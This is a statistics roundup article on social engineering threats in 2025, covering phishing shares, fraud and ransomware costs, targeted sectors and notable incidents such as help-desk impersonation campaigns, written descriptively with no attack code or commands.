Social Engineering Statistics And Facts (2025), By Modes, Types, Challenges and Notable Incidents
Updated · Oct 15, 2025
Table of Contents
Introduction
Social Engineering Statistics: Sometimes an insider becomes the risk. That is why many organisations consider social engineering the most significant security threat: it exploits the inherent trust that code-testing mechanisms cannot protect against. Other than systems being hacked, the dark side of social engineering manipulates emotions and behaviours to achieve entry. From scams as old as time to modern-day digital trickery, criminals never miss an opportunity to exploit psychological weaknesses.
Cybercriminals will do just about anything to get their victims’ valuables. Knowing social engineering statistics about these human-layer impacts will help organisations reinforce their defence systems and prepare for permanent resilience against this ever-important scourge.
Editor’s Choice
- Phishing continues to be the most popular social engineering technique, accounting for 65% of cases, with 45.2% of attachments being malicious PDFs.
- Fake CAPTCHA campaigns soared by 1450% in the first quarter of 2025, driving the surge in social engineering incidents.
- Social engineering was responsible for 39% of all initial access incidents in 2025, reflecting its intrinsic role in breaches.
- 81% of breaches were caused by external agents, with social engineering tactics involved in 20% of all such incidents.
- Email phishing accounts for 39% of intrusions in the cloud, stolen credentials for 35%, with SIM swapping and vishing making up 6% each.
- Ransomware constituted 28% of malware cases and 11% of all security incidents, with dark-web chatter rising 25% year over year.
- Almost every person worldwide gets scammed once or twice a week, with Microsoft blocking 27,860 password attacks every second.
- Healthcare & Pharmaceuticals were the most vulnerable sectors of the economy (41.9%), followed by Insurance (39.2%) and Retail/Wholesale (36.5%).
- The global cybercrime costs are expected to rise to an estimated US$10.5 trillion annually in 2025, with scammers stealing US$1 trillion in 2024.
- Fraud losses of US$12.5 billion were reported by U.S. consumers in 2024, with government impostor scams accounting for US$789 million.
- BEC inflicted damages exceeding US$6.3 billion in 2024, with an average loss of US$50,000 per incident.
- In 2024, ransomware victims experienced an average payment of US$115,000, yet 64% of organisations refused to pay, an increase from 50% just two years earlier.
Modes of Cyber Attacks
![Popular Modes Of External Cyber Attacks [2025]](https://electroiq.com/wp-content/uploads/2025/09/oejXc-popular-modes-of-external-cyber-attacks-2025-.png.webp)
(Reference: sprinto.com)
- Social engineering is the most popular path whereby an attacker gains access to a system, with phishing attacks alone accounting for 65% of these cases.
- Some 36% of all incidents handled and worked upon in incident response caseloads initially start with some variation of social engineering.
- In early 2025, social engineering sat behind 39% of initial access incidents, a spike caused by an unprecedented 1450% growth in fake CAPTCHA attacks, among them ClickFix campaigns.
- External attackers continue to exert worry at 81% of breaches, and out of these, 20% also include social engineering, proving that manipulation of persons is still the favourite route for attacks.
- Phishing has slightly declined but continues to pose a serious threat, accounting for 25% of social engineering incidents in 2024, down from 29% in 2023 and 46% in 2022.
- Malicious attachments mostly carry these phishing campaigns; PDFs are the most abused option at 45.2%, followed by HTML at 17.4% and ZIP files at 10.4%.
- Of malicious PDFs, 42% obfuscated harmful links, 28% hid them in streams, and 7% used password protection to avoid detection.
- Usurped credentials made for the second-most-used entry point in 2024, with 16% of intrusions, overtaking the traditional email-phishing category with 14%.
- Initial access through email phishing remained the most common access vector for cloud instances at 39%, whereas stolen credentials followed close behind at 35%, with SIM swapping and vishing jointly representing 6% each.
- Adversaries used “adversary-in-the-middle” kits and other MFA bypass mechanisms that degraded two-factor authentication.
- Quite interestingly, 66% of phishing attempts in social engineering targeted privileged accounts, while 45% impersonated internal users to trick their victims.
- Ransomware accounted for 28% of malware-related cases and 11% of all security breaches; moreover, dark-web chatter concerning ransomware escalated by 25% on a year-to-year basis in 2024.
- The most recurrent impacts of social engineering were credential theft (29%), data theft (18%), and extortion (13%). Manufacturing got hit hardest, composing 26% of all incidents in 2024.
- Attackers are getting faster and more rampaged, often with lateral movement happening within 60 minutes and sometimes much faster, like less than 15 minutes.
- Over 90% of social engineering attacks start out by assuming the guise of an apparent cooperation or engagement, rendering the modus operandi highly deceptive.
- These attacks caused 60% of the data leakage incidents incidence 16% higher than those by other attack vectors.
- Half for business email compromise, and a fraction more than 60% of these occasions led to the divulging of sensitive information at the very forefront of social engineering damage.
Types of Social Engineering Attacks
(Reference: cxquest.com)
- As per Cxquest, social engineering statistics show that in the breakdown of social engineering attacks, phishing hoges much of the limelight with 65% of all cases being ascribed to it.
- Another, though smaller yet sizable, share of 22% goes to others, probably, lesser-known means.
- At 12% come SEO Poisoning and Malvertising, in which the attackers abuse search results or deploy fake ads to entice potential victims into clicking on malicious links.
- The very least: Smishing (SMS phishing) and MFA bombing, making up a mere 1% of incidents combined.
- It just goes on to shed more light on email phishing, retaining its spotlight with attackers, even though newer mechanisms come into the fore.
Increasing Number of Social Engineering Attacks
- Social engineering is now an everyday issue for individuals and organisations, with numbers showing the rise and pervasiveness of such attacks.
- Worldwide, 50% of people encounter one scam or another every week, with an almost 50% surge in advance fee fraud in the year 2025.
- Microsoft points to the scale of the problem by saying that it could stop nearly 27,860 password attacks in the time it takes for someone to read a single sentence.
- At an organisational level, 20 per cent of companies have to deal with at least one account takeover incident monthly, meaning that the risk is present and ever-increasing.
- Social engineering is not just common; it is up front and centre in the landscape of modern cybercrime.
- It acts as a component in 25% of all patchy advanced cyberattack campaigns.
- Some industries are most vulnerable at the level Healthcare & Pharmaceuticals at 41.9%, followed by Insurance at 39.2%, then Retail & Wholesale at 36.5%.
- In fact, between 2023 and 2024, almost 389 healthcare institutions were hit by ransomware, thereby causing operations to be delayed and appointments to be rescheduled.
- The phishing scenario is devastating enough, with the industry-wide Phish-prone Percentage (PPP) standing at 33.1%, translating to symbols of vulnerability of generally one-third of employees across industries to phishing and related offences.
- A higher value is also added to the dangers of leaking sensitive information. Over 1.5 million credentials were exposed in code or publicly from January to June 2024, with 18% of repositories harbouring such secrets.
- Simultaneously, Microsoft got busy in 2H (second half) 2024, mitigating a staggering 1.25 million distributed denial-of-service (DDoS) attacks, nearly quadrupling the previous year’s figures.
- Smaller businesses are victims here as a weak link; 55.8% of ransomware attacks are directed towards companies with 1–50 employees, underscoring how attackers focus on targets with little defence.
- Nowadays, espionage takes up 52% of social engineering-related breaches, whereas 55% are financially motivated.
- 30% of intrusions are due to exploitation of Internet-facing applications, and another 30% due to theft or misuse of login credentials, the top two ways intrusions are carried into an environment.
Social Engineering – Cost And Consequences
- Beyond mere system breaches, social engineering attacks capitalise on human factors like trust, curiosity, and avenues of communication to enable them to cause financial and operational havoc.
- The figures show how costly this threat has become worldwide. In 2024, the average cost of a data breach was US$4.88 million; however, the figure has slipped slightly to US$4.4 million in 2025.
- That decrease notwithstanding, cybercrime in general is still rising sharply, with yearly damages estimated to reach US$10.5 trillion.
- Scam artists drained over US$1 trillion around the world in 2024, with U.S. consumers losing US$12.5 billion to fraud, of which US$789 million were impostor scams by the government.
- Investment scams are among the most expensive, creating more than US$4.5 billion in damages from 2023 to 2024.
- Technical scams are equally rampant, too, with 90% of malicious traffic on Microsoft Edge linked to them.
- Call centre scams appear to be a setup targeting the elderly and crypto traders, posing a reported loss of US$1.9 billion, and recovery is rare.
- On 4%, it’s said that scam victims get money back worldwide. Compare that with systems designed for fraud being responsive in the U.S. and the U.K.
- Login credentials appeared stolen in 29% of the events in 2024, while ransom payments averaged US$115,000 per incident.
- On the bright side, more organisations are resolving to refuse paying ransom: 64% in 2024 compared to only 50% two years ago.
- Small businesses are, however, hit worse with 1 in 5 paying ransom, usually within minutes, between US$10,000 and US$100,000.
- Business Email Compromise (BEC) continues to hold the record for the most damaging attack method by clocking in at US$6.3 billion in losses globally in 2024, with median losses of US$50,000 reported in nearly 19,000 cases.
- Manufacturing has lately become fertile ground, with extortion at 29% of victims and data theft at 24% and both working to compromise funds and intellectual property.
- Aggravating the scenario, credentials for corporate use are frequently found in stolen data dumps; domains were revealed in 54% of ransomware steals, while almost half of the target devices were unmanaged, admitting to the blending of personal and business logins.
Notable Incidents In Social Engineering Statistics
- Between 2024 and 2025, social engineering attacks became more intricate and serious, making the tactic more targeted toward infiltration rather than extermination through simple phishing.
- The attackers started embedding themselves into trusted tools and workflows, making it challenging to trace their presence.
- According to a report by the NCC Group, an Irish cyber consulting firm, attackers can compromise a system so quickly.
- The attackers used multiple methods to gain remote access, first by impersonating IT support and using Windows QuickAssist within minutes.
- They would then drop malware concealed in images, steal credentials via fake login screens, and front-load legitimate software to keep away from detection.
- A major breach also rocked the crypto sector when an engineer at CoinDCX supposedly facilitated the theft of US$44 million via social engineering. This act of insider threat seriously highlighted what weak vetting could cause to deliver heavy losses.
- Attackers would also frequently pose as IT support in live chats on Teams, gaining somewhat legitimate remote access if they could convince the user to grant them very access that later turned into ransomware.
- A very well-developed operation, Octo Tempest and UNC5537 stepped up their game.
- Octo Tempest is evolving from SIM-swapping to ransomware on a full scale, and UNC5537is actively using stolen Snowflake credentials to exfiltrate sensitive data for extortion.
- UNC3944 used phone-based help desk impersonation to negate multifactor authentication and escalate to hands-on extortion, sometimes implementing ransomware, such as RANSOMHUB.
Conclusion
Social Engineering Statistics: Social engineering has turned into a very pertinent cybersecurity threat of 2025. From phishing—dominating about 65% of all known incidents—to advanced techniques like FileFix or adversary-in-the-middle, attackers misuse human behaviour more than technical vulnerabilities. The financial and operational damage is deeply staggering, with annual costs estimated at US$10.5 trillion.
Primary sectors targeted include healthcare, finance, and manufacturing, even as small businesses are disproportionately affected. With advancements on the offensive, defenders should focus on awareness, hardened authentication mechanisms, and fast response to incidents. Countering social engineering needs a blend of technologies, awareness, and a culture to resist manipulation.
FAQ.
Phishing is considered the most prevalent because it targets trust and common engagement methods. About 65% of cases of social engineering took place in 2025, utilising traceable PDFs, HTML files, or zipped attachments as ways of links (s) to certain malicious sites. It is that simplicity, scalable Nature, and a high success rate that make it the method most attackers prefer.
These have the highest incidence rate in Healthcare and Pharmaceuticals at 41.9%, followed by Insurance (39.2%) and Retail/Wholesale (36.5%). Being sectors that maintain sensitive personal and financial data, these industries are prized targets. The attackers also capitalise on industries’ heavy reliance on digital communication and often weaker defences.
One can continue talking about this forever. The damages suffered due to cybercrimes are alleged to go to US$10.5 trillion by 2025, and with social engineering, the scammers are expected to have made upward of a trillion in 2024 alone. Consumers in the U.S. have accounted for around US$12.5 billion worth of fraud losses, while an instance of Business Email Compromise recorded damages of US$6.3 billion. Ransomware victims, on average, would pay US$115,000 per attack.
Newer techniques include fake helpdesk operations using Windows QuickAssist, FileFix attacks which persuade the user to execute malicious commands, and adversary-in-the-middle kits to bypass multifactor authentication. Attackers impersonate security staff on collaboration platforms as well.
Defence mechanisms, layered in nature, must be present against social engineering. Training staff continuously will decrease the chance of being phished. However, strong authentication measures and multifactor authentication stand to prevent unauthorised entry.
I hold an MBA in Finance and Marketing, bringing a unique blend of business acumen and creative communication skills. With experience as a content in crafting statistical and research-backed content across multiple domains, including education, technology, product reviews, and company website analytics, I specialize in producing engaging, informative, and SEO-optimized content tailored to diverse audiences. My work bridges technical accuracy with compelling storytelling, helping brands educate, inform, and connect with their target markets.
